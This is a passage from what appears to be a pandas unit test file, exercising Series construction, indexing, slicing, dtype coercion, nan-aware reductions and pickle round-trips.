self._pickle_roundtrip_name(self.ts)\n self.assertEqual(unpickled.name, self.ts.name)\n\n def _pickle_roundtrip_name(self, obj):\n\n 
with ensure_clean() as path:\n obj.to_pickle(path)\n unpickled = pd.read_pickle(path)\n return unpickled\n\n def test_argsort_preserve_name(self):\n result = self.ts.argsort()\n self.assertEqual(result.name, self.ts.name)\n\n def test_sort_index_name(self):\n result = self.ts.sort_index(ascending=False)\n self.assertEqual(result.name, self.ts.name)\n\n def test_to_sparse_pass_name(self):\n result = self.ts.to_sparse()\n self.assertEqual(result.name, self.ts.name)\n\n\nclass TestNanops(tm.TestCase):\n\n _multiprocess_can_split_ = True\n\n def test_comparisons(self):\n left = np.random.randn(10)\n right = np.random.randn(10)\n left[:3] = np.nan\n\n result = nanops.nangt(left, right)\n expected = (left > right).astype('O')\n expected[:3] = np.nan\n\n assert_almost_equal(result, expected)\n\n s = Series(['a', 'b', 'c'])\n s2 = Series([False, True, False])\n\n # it works!\n s == s2\n s2 == s\n\n def test_none_comparison(self):\n # bug brought up by #1079\n s = Series(np.random.randn(10), index=lrange(0, 20, 2))\n self.assertRaises(TypeError, s.__eq__, None)\n\n def test_sum_zero(self):\n arr = np.array([])\n self.assertEqual(nanops.nansum(arr), 0)\n\n arr = np.empty((10, 0))\n self.assertTrue((nanops.nansum(arr, axis=1) == 0).all())\n\n # GH #844\n s = Series([], index=[])\n self.assertEqual(s.sum(), 0)\n\n df = DataFrame(np.empty((10, 0)))\n self.assertTrue((df.sum(1) == 0).all())\n\n def test_nansum_buglet(self):\n s = Series([1.0, np.nan], index=[0, 1])\n result = np.nansum(s)\n assert_almost_equal(result, 1)\n\n def test_overflow(self):\n\n # GH 6915\n # overflowing on the smaller int dtypes\n for dtype in ['int32','int64']:\n v = np.arange(5000000,dtype=dtype)\n s = Series(v)\n\n # no bottleneck\n result = s.sum(skipna=False)\n self.assertEqual(int(result),v.sum(dtype='int64'))\n result = s.min(skipna=False)\n self.assertEqual(int(result),0)\n result = s.max(skipna=False)\n self.assertEqual(int(result),v[-1])\n\n # use bottleneck if available\n result = s.sum()\n self.assertEqual(int(result),v.sum(dtype='int64'))\n result = s.min()\n self.assertEqual(int(result),0)\n result = s.max()\n self.assertEqual(int(result),v[-1])\n\n for dtype in ['float32','float64']:\n v = np.arange(5000000,dtype=dtype)\n s = Series(v)\n\n # no bottleneck\n result = s.sum(skipna=False)\n self.assertTrue(np.allclose(float(result),v.sum(dtype='float64')))\n result = s.min(skipna=False)\n self.assertTrue(np.allclose(float(result),0.0))\n result = s.max(skipna=False)\n self.assertTrue(np.allclose(float(result),v[-1]))\n\n # use bottleneck if available\n result = s.sum()\n self.assertTrue(np.allclose(float(result),v.sum(dtype='float64')))\n result = s.min()\n self.assertTrue(np.allclose(float(result),0.0))\n result = s.max()\n self.assertTrue(np.allclose(float(result),v[-1]))\n\nclass SafeForSparse(object):\n pass\n\n_ts = tm.makeTimeSeries()\n\nclass TestSeries(tm.TestCase, CheckNameIntegration):\n\n _multiprocess_can_split_ = True\n\n def setUp(self):\n import warnings\n warnings.filterwarnings(action='ignore', category=FutureWarning)\n\n self.ts = _ts.copy()\n self.ts.name = 'ts'\n\n self.series = tm.makeStringSeries()\n self.series.name = 'series'\n\n self.objSeries = tm.makeObjectSeries()\n self.objSeries.name = 'objects'\n\n self.empty = Series([], index=[])\n\n def test_scalar_conversion(self):\n\n # Pass in scalar is disabled\n scalar = Series(0.5)\n self.assertNotIsInstance(scalar, float)\n\n # coercion\n self.assertEqual(float(Series([1.])), 1.0)\n self.assertEqual(int(Series([1.])), 1)\n 
self.assertEqual(long(Series([1.])), 1)\n\n def test_astype(self):\n s = Series(np.random.randn(5),name='foo')\n\n for dtype in ['float32','float64','int64','int32']:\n astyped = s.astype(dtype)\n self.assertEqual(astyped.dtype, dtype)\n self.assertEqual(astyped.name, s.name)\n\n def test_constructor(self):\n # Recognize TimeSeries\n self.assertTrue(self.ts.is_time_series)\n\n # Pass in Series\n derived = Series(self.ts)\n self.assertTrue(derived.is_time_series)\n\n self.assertTrue(tm.equalContents(derived.index, self.ts.index))\n # Ensure new index is not created\n self.assertEqual(id(self.ts.index), id(derived.index))\n\n # Mixed type Series\n mixed = Series(['hello', np.NaN], index=[0, 1])\n self.assertEqual(mixed.dtype, np.object_)\n self.assertIs(mixed[1], np.NaN)\n\n self.assertFalse(self.empty.is_time_series)\n self.assertFalse(Series({}).is_time_series)\n\n self.assertRaises(Exception, Series, np.random.randn(3, 3),\n index=np.arange(3))\n\n mixed.name = 'Series'\n rs = Series(mixed).name\n xp = 'Series'\n self.assertEqual(rs, xp)\n\n # raise on MultiIndex GH4187\n m = MultiIndex.from_arrays([[1, 2], [3, 4]])\n self.assertRaises(NotImplementedError, Series, m)\n\n def test_constructor_empty(self):\n empty = Series()\n empty2 = Series([])\n assert_series_equal(empty, empty2)\n\n empty = Series(index=lrange(10))\n empty2 = Series(np.nan, index=lrange(10))\n assert_series_equal(empty, empty2)\n\n def test_constructor_series(self):\n index1 = ['d', 'b', 'a', 'c']\n index2 = sorted(index1)\n s1 = Series([4, 7, -5, 3], index=index1)\n s2 = Series(s1, index=index2)\n\n assert_series_equal(s2, s1.sort_index())\n\n def test_constructor_iterator(self):\n\n expected = Series(list(range(10)),dtype='int64')\n result = Series(range(10),dtype='int64')\n assert_series_equal(result, expected)\n\n def test_constructor_generator(self):\n gen = (i for i in range(10))\n\n result = Series(gen)\n exp = Series(lrange(10))\n assert_series_equal(result, exp)\n\n gen = (i for i in range(10))\n result = Series(gen, index=lrange(10, 20))\n exp.index = lrange(10, 20)\n assert_series_equal(result, exp)\n\n def test_constructor_map(self):\n # GH8909\n m = map(lambda x: x, range(10))\n\n result = Series(m)\n exp = Series(lrange(10))\n assert_series_equal(result, exp)\n\n m = map(lambda x: x, range(10))\n result = Series(m, index=lrange(10, 20))\n exp.index = lrange(10, 20)\n assert_series_equal(result, exp)\n\n def test_constructor_categorical(self):\n cat = pd.Categorical([0, 1, 2, 0, 1, 2], ['a', 'b', 'c'], fastpath=True)\n cat.name = 'foo'\n res = Series(cat)\n self.assertEqual(res.name, cat.name)\n self.assertTrue(res.values.equals(cat))\n\n def test_constructor_maskedarray(self):\n data = ma.masked_all((3,), dtype=float)\n result = Series(data)\n expected = Series([nan, nan, nan])\n assert_series_equal(result, expected)\n\n data[0] = 0.0\n data[2] = 2.0\n index = ['a', 'b', 'c']\n result = Series(data, index=index)\n expected = Series([0.0, nan, 2.0], index=index)\n assert_series_equal(result, expected)\n\n data[1] = 1.0\n result = Series(data, index=index)\n expected = Series([0.0, 1.0, 2.0], index=index)\n assert_series_equal(result, expected)\n\n data = ma.masked_all((3,), dtype=int)\n result = Series(data)\n expected = Series([nan, nan, nan], dtype=float)\n assert_series_equal(result, expected)\n\n data[0] = 0\n data[2] = 2\n index = ['a', 'b', 'c']\n result = Series(data, index=index)\n expected = Series([0, nan, 2], index=index, dtype=float)\n assert_series_equal(result, expected)\n\n data[1] = 1\n 
result = Series(data, index=index)\n expected = Series([0, 1, 2], index=index, dtype=int)\n assert_series_equal(result, expected)\n\n data = ma.masked_all((3,), dtype=bool)\n result = Series(data)\n expected = Series([nan, nan, nan], dtype=object)\n assert_series_equal(result, expected)\n\n data[0] = True\n data[2] = False\n index = ['a', 'b', 'c']\n result = Series(data, index=index)\n expected = Series([True, nan, False], index=index, dtype=object)\n assert_series_equal(result, expected)\n\n data[1] = True\n result = Series(data, index=index)\n expected = Series([True, True, False], index=index, dtype=bool)\n assert_series_equal(result, expected)\n\n from pandas import tslib\n data = ma.masked_all((3,), dtype='M8[ns]')\n result = Series(data)\n expected = Series([tslib.iNaT, tslib.iNaT, tslib.iNaT], dtype='M8[ns]')\n assert_series_equal(result, expected)\n\n data[0] = datetime(2001, 1, 1)\n data[2] = datetime(2001, 1, 3)\n index = ['a', 'b', 'c']\n result = Series(data, index=index)\n expected = Series([datetime(2001, 1, 1), tslib.iNaT,\n datetime(2001, 1, 3)], index=index, dtype='M8[ns]')\n assert_series_equal(result, expected)\n\n data[1] = datetime(2001, 1, 2)\n result = Series(data, index=index)\n expected = Series([datetime(2001, 1, 1), datetime(2001, 1, 2),\n datetime(2001, 1, 3)], index=index, dtype='M8[ns]')\n assert_series_equal(result, expected)\n\n def test_constructor_default_index(self):\n s = Series([0, 1, 2])\n assert_almost_equal(s.index, np.arange(3))\n\n def test_constructor_corner(self):\n df = tm.makeTimeDataFrame()\n objs = [df, df]\n s = Series(objs, index=[0, 1])\n tm.assert_isinstance(s, Series)\n\n def test_constructor_sanitize(self):\n s = Series(np.array([1., 1., 8.]), dtype='i8')\n self.assertEqual(s.dtype, np.dtype('i8'))\n\n s = Series(np.array([1., 1., np.nan]), copy=True, dtype='i8')\n self.assertEqual(s.dtype, np.dtype('f8'))\n\n def test_constructor_pass_none(self):\n s = Series(None, index=lrange(5))\n self.assertEqual(s.dtype, np.float64)\n\n s = Series(None, index=lrange(5), dtype=object)\n self.assertEqual(s.dtype, np.object_)\n\n # GH 7431\n # inference on the index\n s = Series(index=np.array([None]))\n expected = Series(index=Index([None]))\n assert_series_equal(s,expected)\n\n def test_constructor_cast(self):\n self.assertRaises(ValueError, Series, ['a', 'b', 'c'], dtype=float)\n\n def test_constructor_dtype_nocast(self):\n # 1572\n s = Series([1, 2, 3])\n\n s2 = Series(s, dtype=np.int64)\n\n s2[1] = 5\n self.assertEqual(s[1], 5)\n\n def test_constructor_dtype_datetime64(self):\n import pandas.tslib as tslib\n\n s = Series(tslib.iNaT, dtype='M8[ns]', index=lrange(5))\n self.assertTrue(isnull(s).all())\n\n # in theory this should be all nulls, but since\n # we are not specifying a dtype is ambiguous\n s = Series(tslib.iNaT, index=lrange(5))\n self.assertFalse(isnull(s).all())\n\n s = Series(nan, dtype='M8[ns]', index=lrange(5))\n self.assertTrue(isnull(s).all())\n\n s = Series([datetime(2001, 1, 2, 0, 0), tslib.iNaT], dtype='M8[ns]')\n self.assertTrue(isnull(s[1]))\n self.assertEqual(s.dtype, 'M8[ns]')\n\n s = Series([datetime(2001, 1, 2, 0, 0), nan], dtype='M8[ns]')\n self.assertTrue(isnull(s[1]))\n self.assertEqual(s.dtype, 'M8[ns]')\n\n # GH3416\n dates = [\n np.datetime64(datetime(2013, 1, 1)),\n np.datetime64(datetime(2013, 1, 2)),\n np.datetime64(datetime(2013, 1, 3)),\n ]\n\n s = Series(dates)\n self.assertEqual(s.dtype, 'M8[ns]')\n\n s.ix[0] = np.nan\n self.assertEqual(s.dtype, 'M8[ns]')\n\n # invalid astypes\n for t in ['s', 'D', 'us', 
'ms']:\n self.assertRaises(TypeError, s.astype, 'M8[%s]' % t)\n\n # GH3414 related\n self.assertRaises(TypeError, lambda x: Series(\n Series(dates).astype('int') / 1000000, dtype='M8[ms]'))\n self.assertRaises(\n TypeError, lambda x: Series(dates, dtype='datetime64'))\n\n # invalid dates can be help as object\n result = Series([datetime(2,1,1)])\n self.assertEqual(result[0], datetime(2,1,1,0,0))\n\n result = Series([datetime(3000,1,1)])\n self.assertEqual(result[0], datetime(3000,1,1,0,0))\n\n # don't mix types\n result = Series([ Timestamp('20130101'), 1],index=['a','b'])\n self.assertEqual(result['a'], Timestamp('20130101'))\n self.assertEqual(result['b'], 1)\n\n # GH6529\n # coerce datetime64 non-ns properly\n dates = date_range('01-Jan-2015', '01-Dec-2015', freq='M')\n values2 = dates.view(np.ndarray).astype('datetime64[ns]')\n expected = Series(values2, dates)\n\n for dtype in ['s', 'D', 'ms', 'us', 'ns']:\n values1 = dates.view(np.ndarray).astype('M8[{0}]'.format(dtype))\n result = Series(values1, dates)\n assert_series_equal(result,expected)\n\n # leave datetime.date alone\n dates2 = np.array([d.date() for d in dates.to_pydatetime()],\n dtype=object)\n series1 = Series(dates2, dates)\n self.assert_numpy_array_equal(series1.values,dates2)\n self.assertEqual(series1.dtype,object)\n\n # these will correctly infer a datetime\n s = Series([None, pd.NaT, '2013-08-05 15:30:00.000001'])\n self.assertEqual(s.dtype,'datetime64[ns]')\n s = Series([np.nan, pd.NaT, '2013-08-05 15:30:00.000001'])\n self.assertEqual(s.dtype,'datetime64[ns]')\n s = Series([pd.NaT, None, '2013-08-05 15:30:00.000001'])\n self.assertEqual(s.dtype,'datetime64[ns]')\n s = Series([pd.NaT, np.nan, '2013-08-05 15:30:00.000001'])\n self.assertEqual(s.dtype,'datetime64[ns]')\n\n # tz-aware (UTC and other tz's)\n # GH 8411\n dr = date_range('20130101',periods=3)\n self.assertTrue(Series(dr).iloc[0].tz is None)\n dr = date_range('20130101',periods=3,tz='UTC')\n self.assertTrue(str(Series(dr).iloc[0].tz) == 'UTC')\n dr = date_range('20130101',periods=3,tz='US/Eastern')\n self.assertTrue(str(Series(dr).iloc[0].tz) == 'US/Eastern')\n\n def test_constructor_periodindex(self):\n # GH7932\n # converting a PeriodIndex when put in a Series\n\n pi = period_range('20130101',periods=5,freq='D')\n s = Series(pi)\n expected = Series(pi.asobject)\n assert_series_equal(s, expected)\n\n def test_constructor_dict(self):\n d = {'a': 0., 'b': 1., 'c': 2.}\n result = Series(d, index=['b', 'c', 'd', 'a'])\n expected = Series([1, 2, nan, 0], index=['b', 'c', 'd', 'a'])\n assert_series_equal(result, expected)\n\n pidx = tm.makePeriodIndex(100)\n d = {pidx[0]: 0, pidx[1]: 1}\n result = Series(d, index=pidx)\n expected = Series(np.nan, pidx)\n expected.ix[0] = 0\n expected.ix[1] = 1\n assert_series_equal(result, expected)\n\n def test_constructor_dict_multiindex(self):\n check = lambda result, expected: tm.assert_series_equal(\n result, expected, check_dtype=True, check_index_type=True,\n check_series_type=True)\n d = {('a', 'a'): 0., ('b', 'a'): 1., ('b', 'c'): 2.}\n _d = sorted(d.items())\n ser = Series(d)\n expected = Series([x[1] for x in _d],\n index=MultiIndex.from_tuples([x[0] for x in _d]))\n check(ser, expected)\n\n d['z'] = 111.\n _d.insert(0, ('z', d['z']))\n ser = Series(d)\n expected = Series(\n [x[1] for x in _d],\n index=Index([x[0] for x in _d], tupleize_cols=False))\n ser = ser.reindex(index=expected.index)\n check(ser, expected)\n\n def test_constructor_subclass_dict(self):\n data = tm.TestSubDict((x, 10.0 * x) for x in range(10))\n 
series = Series(data)\n refseries = Series(dict(compat.iteritems(data)))\n assert_series_equal(refseries, series)\n\n def test_orderedDict_ctor(self):\n # GH3283\n import pandas\n import random\n data = OrderedDict([('col%s' % i, random.random()) for i in range(12)])\n s = pandas.Series(data)\n self.assertTrue(all(s.values == list(data.values())))\n\n def test_orderedDict_subclass_ctor(self):\n # GH3283\n import pandas\n import random\n\n class A(OrderedDict):\n pass\n data = A([('col%s' % i, random.random()) for i in range(12)])\n s = pandas.Series(data)\n self.assertTrue(all(s.values == list(data.values())))\n\n def test_constructor_list_of_tuples(self):\n data = [(1, 1), (2, 2), (2, 3)]\n s = Series(data)\n self.assertEqual(list(s), data)\n\n def test_constructor_tuple_of_tuples(self):\n data = ((1, 1), (2, 2), (2, 3))\n s = Series(data)\n self.assertEqual(tuple(s), data)\n\n def test_constructor_set(self):\n values = set([1, 2, 3, 4, 5])\n self.assertRaises(TypeError, Series, values)\n values = frozenset(values)\n self.assertRaises(TypeError, Series, values)\n\n def test_fromDict(self):\n data = {'a': 0, 'b': 1, 'c': 2, 'd': 3}\n\n series = Series(data)\n self.assertTrue(tm.is_sorted(series.index))\n\n data = {'a': 0, 'b': '1', 'c': '2', 'd': datetime.now()}\n series = Series(data)\n self.assertEqual(series.dtype, np.object_)\n\n data = {'a': 0, 'b': '1', 'c': '2', 'd': '3'}\n series = Series(data)\n self.assertEqual(series.dtype, np.object_)\n\n data = {'a': '0', 'b': '1'}\n series = Series(data, dtype=float)\n self.assertEqual(series.dtype, np.float64)\n\n def test_setindex(self):\n # wrong type\n series = self.series.copy()\n self.assertRaises(TypeError, setattr, series, 'index', None)\n\n # wrong length\n series = self.series.copy()\n self.assertRaises(Exception, setattr, series, 'index',\n np.arange(len(series) - 1))\n\n # works\n series = self.series.copy()\n series.index = np.arange(len(series))\n tm.assert_isinstance(series.index, Index)\n\n def test_array_finalize(self):\n pass\n\n def test_pop(self):\n # GH 6600\n df = DataFrame({\n 'A': 0,\n 'B': np.arange(5,dtype='int64'),\n 'C': 0,\n })\n k = df.iloc[4]\n\n result = k.pop('B')\n self.assertEqual(result, 4)\n\n expected = Series([0,0],index=['A','C'])\n assert_series_equal(k, expected)\n\n def test_not_hashable(self):\n s_empty = Series()\n s = Series([1])\n self.assertRaises(TypeError, hash, s_empty)\n self.assertRaises(TypeError, hash, s)\n\n def test_fromValue(self):\n\n nans = Series(np.NaN, index=self.ts.index)\n self.assertEqual(nans.dtype, np.float_)\n self.assertEqual(len(nans), len(self.ts))\n\n strings = Series('foo', index=self.ts.index)\n self.assertEqual(strings.dtype, np.object_)\n self.assertEqual(len(strings), len(self.ts))\n\n d = datetime.now()\n dates = Series(d, index=self.ts.index)\n self.assertEqual(dates.dtype, 'M8[ns]')\n self.assertEqual(len(dates), len(self.ts))\n\n def test_contains(self):\n tm.assert_contains_all(self.ts.index, self.ts)\n\n def test_pickle(self):\n unp_series = self._pickle_roundtrip(self.series)\n unp_ts = self._pickle_roundtrip(self.ts)\n assert_series_equal(unp_series, self.series)\n assert_series_equal(unp_ts, self.ts)\n\n def _pickle_roundtrip(self, obj):\n\n with ensure_clean() as path:\n obj.to_pickle(path)\n unpickled = pd.read_pickle(path)\n return unpickled\n\n def test_getitem_get(self):\n idx1 = self.series.index[5]\n idx2 = self.objSeries.index[5]\n\n self.assertEqual(self.series[idx1], self.series.get(idx1))\n self.assertEqual(self.objSeries[idx2], 
self.objSeries.get(idx2))\n\n self.assertEqual(self.series[idx1], self.series[5])\n self.assertEqual(self.objSeries[idx2], self.objSeries[5])\n\n self.assertEqual(\n self.series.get(-1), self.series.get(self.series.index[-1]))\n self.assertEqual(self.series[5], self.series.get(self.series.index[5]))\n\n # missing\n d = self.ts.index[0] - datetools.bday\n self.assertRaises(KeyError, self.ts.__getitem__, d)\n\n # None\n # GH 5652\n for s in [Series(), Series(index=list('abc'))]:\n result = s.get(None)\n self.assertIsNone(result)\n\n def test_iget(self):\n s = Series(np.random.randn(10), index=lrange(0, 20, 2))\n for i in range(len(s)):\n result = s.iget(i)\n exp = s[s.index[i]]\n assert_almost_equal(result, exp)\n\n # pass a slice\n result = s.iget(slice(1, 3))\n expected = s.ix[2:4]\n assert_series_equal(result, expected)\n\n # test slice is a view\n result[:] = 0\n self.assertTrue((s[1:3] == 0).all())\n\n # list of integers\n result = s.iget([0, 2, 3, 4, 5])\n expected = s.reindex(s.index[[0, 2, 3, 4, 5]])\n assert_series_equal(result, expected)\n\n def test_iget_nonunique(self):\n s = Series([0, 1, 2], index=[0, 1, 0])\n self.assertEqual(s.iget(2), 2)\n\n def test_getitem_regression(self):\n s = Series(lrange(5), index=lrange(5))\n result = s[lrange(5)]\n assert_series_equal(result, s)\n\n def test_getitem_setitem_slice_bug(self):\n s = Series(lrange(10), lrange(10))\n result = s[-12:]\n assert_series_equal(result, s)\n\n result = s[-7:]\n assert_series_equal(result, s[3:])\n\n result = s[:-12]\n assert_series_equal(result, s[:0])\n\n s = Series(lrange(10), lrange(10))\n s[-12:] = 0\n self.assertTrue((s == 0).all())\n\n s[:-12] = 5\n self.assertTrue((s == 0).all())\n\n def test_getitem_int64(self):\n idx = np.int64(5)\n self.assertEqual(self.ts[idx], self.ts[5])\n\n def test_getitem_fancy(self):\n slice1 = self.series[[1, 2, 3]]\n slice2 = self.objSeries[[1, 2, 3]]\n self.assertEqual(self.series.index[2], slice1.index[1])\n self.assertEqual(self.objSeries.index[2], slice2.index[1])\n self.assertEqual(self.series[2], slice1[1])\n self.assertEqual(self.objSeries[2], slice2[1])\n\n def test_getitem_boolean(self):\n s = self.series\n mask = s > s.median()\n\n # passing list is OK\n result = s[list(mask)]\n expected = s[mask]\n assert_series_equal(result, expected)\n self.assert_numpy_array_equal(result.index, s.index[mask])\n\n def test_getitem_boolean_empty(self):\n s = Series([], dtype=np.int64)\n s.index.name = 'index_name'\n s = s[s.isnull()]\n self.assertEqual(s.index.name, 'index_name')\n self.assertEqual(s.dtype, np.int64)\n\n # GH5877\n # indexing with empty series\n s = Series(['A', 'B'])\n expected = Series(np.nan,index=['C'],dtype=object)\n result = s[Series(['C'], dtype=object)]\n assert_series_equal(result, expected)\n\n s = Series(['A', 'B'])\n expected = Series(dtype=object)\n result = s[Series([], dtype=object)]\n assert_series_equal(result, expected)\n\n # invalid because of the boolean indexer\n # that's empty or not-aligned\n def f():\n s[Series([], dtype=bool)]\n self.assertRaises(IndexingError, f)\n\n def f():\n s[Series([True], dtype=bool)]\n self.assertRaises(IndexingError, f)\n\n def test_getitem_generator(self):\n gen = (x > 0 for x in self.series)\n result = self.series[gen]\n result2 = self.series[iter(self.series > 0)]\n expected = self.series[self.series > 0]\n assert_series_equal(result, expected)\n assert_series_equal(result2, expected)\n\n def test_getitem_boolean_object(self):\n # using column from DataFrame\n\n s = self.series\n mask = s > s.median()\n omask 
= mask.astype(object)\n\n # getitem\n result = s[omask]\n expected = s[mask]\n assert_series_equal(result, expected)\n\n # setitem\n s2 = s.copy()\n cop = s.copy()\n cop[omask] = 5\n s2[mask] = 5\n assert_series_equal(cop, s2)\n\n # nans raise exception\n omask[5:10] = np.nan\n self.assertRaises(Exception, s.__getitem__, omask)\n self.assertRaises(Exception, s.__setitem__, omask, 5)\n\n def test_getitem_setitem_boolean_corner(self):\n ts = self.ts\n mask_shifted = ts.shift(1, freq=datetools.bday) > ts.median()\n\n # these used to raise...??\n\n self.assertRaises(Exception, ts.__getitem__, mask_shifted)\n self.assertRaises(Exception, ts.__setitem__, mask_shifted, 1)\n #ts[mask_shifted]\n #ts[mask_shifted] = 1\n\n self.assertRaises(Exception, ts.ix.__getitem__, mask_shifted)\n self.assertRaises(Exception, ts.ix.__setitem__, mask_shifted, 1)\n #ts.ix[mask_shifted]\n #ts.ix[mask_shifted] = 2\n\n def test_getitem_setitem_slice_integers(self):\n s = Series(np.random.randn(8), index=[2, 4, 6, 8, 10, 12, 14, 16])\n\n result = s[:4]\n expected = s.reindex([2, 4, 6, 8])\n assert_series_equal(result, expected)\n\n s[:4] = 0\n self.assertTrue((s[:4] == 0).all())\n self.assertTrue(not (s[4:] == 0).any())\n\n def test_getitem_out_of_bounds(self):\n # don't segfault, GH #495\n self.assertRaises(IndexError, self.ts.__getitem__, len(self.ts))\n\n # GH #917\n s = Series([])\n self.assertRaises(IndexError, s.__getitem__, -1)\n\n def test_getitem_setitem_integers(self):\n # caused bug without test\n s = Series([1, 2, 3], ['a', 'b', 'c'])\n\n self.assertEqual(s.ix[0], s['a'])\n s.ix[0] = 5\n self.assertAlmostEqual(s['a'], 5)\n\n def test_getitem_box_float64(self):\n value = self.ts[5]\n tm.assert_isinstance(value, np.float64)\n\n def test_getitem_ambiguous_keyerror(self):\n s = Series(lrange(10), index=lrange(0, 20, 2))\n self.assertRaises(KeyError, s.__getitem__, 1)\n self.assertRaises(KeyError, s.ix.__getitem__, 1)\n\n def test_getitem_unordered_dup(self):\n obj = Series(lrange(5), index=['c', 'a', 'a', 'b', 'b'])\n self.assertTrue(np.isscalar(obj['c']))\n self.assertEqual(obj['c'], 0)\n\n def test_getitem_dups_with_missing(self):\n\n # breaks reindex, so need to use .ix internally\n # GH 4246\n s = Series([1, 2, 3, 4], ['foo', 'bar', 'foo', 'bah'])\n expected = s.ix[['foo', 'bar', 'bah', 'bam']]\n result = s[['foo', 'bar', 'bah', 'bam']]\n assert_series_equal(result, expected)\n\n def test_getitem_dups(self):\n s = Series(range(5),index=['A','A','B','C','C'],dtype=np.int64)\n expected = Series([3,4],index=['C','C'],dtype=np.int64)\n result = s['C']\n assert_series_equal(result, expected)\n\n def test_getitem_dataframe(self):\n rng = list(range(10))\n s = pd.Series(10, index=rng)\n df = pd.DataFrame(rng, index=rng)\n self.assertRaises(TypeError, s.__getitem__, df>5)\n\n def test_setitem_ambiguous_keyerror(self):\n s = Series(lrange(10), index=lrange(0, 20, 2))\n\n # equivalent of an append\n s2 = s.copy()\n s2[1] = 5\n expected = s.append(Series([5],index=[1]))\n assert_series_equal(s2,expected)\n\n s2 = s.copy()\n s2.ix[1] = 5\n expected = s.append(Series([5],index=[1]))\n assert_series_equal(s2,expected)\n\n def test_setitem_float_labels(self):\n # note labels are floats\n s = Series(['a', 'b', 'c'], index=[0, 0.5, 1])\n tmp = s.copy()\n\n s.ix[1] = 'zoo'\n tmp.iloc[2] = 'zoo'\n\n assert_series_equal(s, tmp)\n\n def test_slice(self):\n numSlice = self.series[10:20]\n numSliceEnd = self.series[-10:]\n objSlice = self.objSeries[10:20]\n\n self.assertNotIn(self.series.index[9], numSlice.index)\n 
self.assertNotIn(self.objSeries.index[9], objSlice.index)\n\n self.assertEqual(len(numSlice), len(numSlice.index))\n self.assertEqual(self.series[numSlice.index[0]],\n numSlice[numSlice.index[0]])\n\n self.assertEqual(numSlice.index[1], self.series.index[11])\n\n self.assertTrue(tm.equalContents(numSliceEnd,\n np.array(self.series)[-10:]))\n\n # test return view\n sl = self.series[10:20]\n sl[:] = 0\n self.assertTrue((self.series[10:20] == 0).all())\n\n def test_slice_can_reorder_not_uniquely_indexed(self):\n s = Series(1, index=['a', 'a', 'b', 'b', 'c'])\n result = s[::-1] # it works!\n\n def test_slice_float_get_set(self):\n\n self.assertRaises(TypeError, lambda : self.ts[4.0:10.0])\n def f():\n self.ts[4.0:10.0] = 0\n self.assertRaises(TypeError, f)\n\n self.assertRaises(TypeError, self.ts.__getitem__, slice(4.5, 10.0))\n self.assertRaises(TypeError, self.ts.__setitem__, slice(4.5, 10.0), 0)\n\n def test_slice_floats2(self):\n s = Series(np.random.rand(10), index=np.arange(10, 20, dtype=float))\n\n self.assertEqual(len(s.ix[12.0:]), 8)\n self.assertEqual(len(s.ix[12.5:]), 7)\n\n i = np.arange(10, 20, dtype=float)\n i[2] = 12.2\n s.index = i\n self.assertEqual(len(s.ix[12.0:]), 8)\n self.assertEqual(len(s.ix[12.5:]), 7)\n\n def test_slice_float64(self):\n\n values = np.arange(10., 50., 2)\n index = Index(values)\n\n start, end = values[[5, 15]]\n\n s = Series(np.random.randn(20), index=index)\n\n result = s[start:end]\n expected = s.iloc[5:16]\n assert_series_equal(result, expected)\n\n result = s.loc[start:end]\n assert_series_equal(result, expected)\n\n df = DataFrame(np.random.randn(20, 3), index=index)\n\n result = df[start:end]\n expected = df.iloc[5:16]\n tm.assert_frame_equal(result, expected)\n\n result = df.loc[start:end]\n tm.assert_frame_equal(result, expected)\n\n def test_setitem(self):\n self.ts[self.ts.index[5]] = np.NaN\n self.ts[[1, 2, 17]] = np.NaN\n self.ts[6] = np.NaN\n self.assertTrue(np.isnan(self.ts[6]))\n self.assertTrue(np.isnan(self.ts[2]))\n self.ts[np.isnan(self.ts)] = 5\n self.assertFalse(np.isnan(self.ts[2]))\n\n # caught this bug when writing tests\n series = Series(tm.makeIntIndex(20).astype(float),\n index=tm.makeIntIndex(20))\n\n series[::2] = 0\n self.assertTrue((series[::2] == 0).all())\n\n # set item that's not contained\n s = self.series.copy()\n s['foobar'] = 1\n expected = self.series.append(Series([1],index=['foobar']))\n assert_series_equal(s,expected)\n\n def test_setitem_dtypes(self):\n\n # change dtypes\n # GH 4463\n expected = Series([np.nan,2,3])\n\n s = Series([1,2,3])\n s.iloc[0] = np.nan\n assert_series_equal(s,expected)\n\n s = Series([1,2,3])\n s.loc[0] = np.nan\n assert_series_equal(s,expected)\n\n s = Series([1,2,3])\n s[0] = np.nan\n assert_series_equal(s,expected)\n\n s = Series([False])\n s.loc[0] = np.nan\n assert_series_equal(s,Series([np.nan]))\n\n s = Series([False,True])\n s.loc[0] = np.nan\n assert_series_equal(s,Series([np.nan,1.0]))\n\n def test_set_value(self):\n idx = self.ts.index[10]\n res = self.ts.set_value(idx, 0)\n self.assertIs(res, self.ts)\n self.assertEqual(self.ts[idx], 0)\n\n # equiv\n s = self.series.copy()\n res = s.set_value('foobar', 0)\n self.assertIs(res, s)\n self.assertEqual(res.index[-1], 'foobar')\n self.assertEqual(res['foobar'], 0)\n\n s = self.series.copy()\n s.loc['foobar'] = 0\n self.assertEqual(s.index[-1], 'foobar')\n self.assertEqual(s['foobar'], 0)\n\n def test_setslice(self):\n sl = self.ts[5:20]\n self.assertEqual(len(sl), len(sl.index))\n self.assertTrue(sl.index.is_unique)\n\n def 
test_basic_getitem_setitem_corner(self):\n # invalid tuples, e.g. self.ts[:, None] vs. self.ts[:, 2]\n with tm.assertRaisesRegexp(ValueError, 'tuple-index'):\n self.ts[:, 2]\n with tm.assertRaisesRegexp(ValueError, 'tuple-index'):\n self.ts[:, 2] = 2\n\n # weird lists. [slice(0, 5)] will work but not two slices\n result = self.ts[[slice(None, 5)]]\n expected = self.ts[:5]\n assert_series_equal(result, expected)\n\n # OK\n self.assertRaises(Exception, self.ts.__getitem__,\n [5, slice(None, None)])\n self.assertRaises(Exception, self.ts.__setitem__,\n [5, slice(None, None)], 2)\n\n def test_reshape_non_2d(self):\n # GH 4554\n x = Series(np.random.random(201), name='x')\n self.assertTrue(x.reshape(x.shape,) is x)\n\n # GH 2719\n a = Series([1, 2, 3, 4])\n result = a.reshape(2, 2)\n expected = a.values.reshape(2, 2)\n np.testing.assert_array_equal(result, expected)\n self.assertTrue(type(result) is type(expected))\n\n def test_reshape_2d_return_array(self):\n x = Series(np.random.random(201), name='x')\n result = x.reshape((-1, 1))\n self.assertNotIsInstance(result, Series)\n\n result2 = np.reshape(x, (-1, 1))\n self.assertNotIsInstance(result2, Series)\n\n result = x[:, None]\n expected = x.reshape((-1, 1))\n 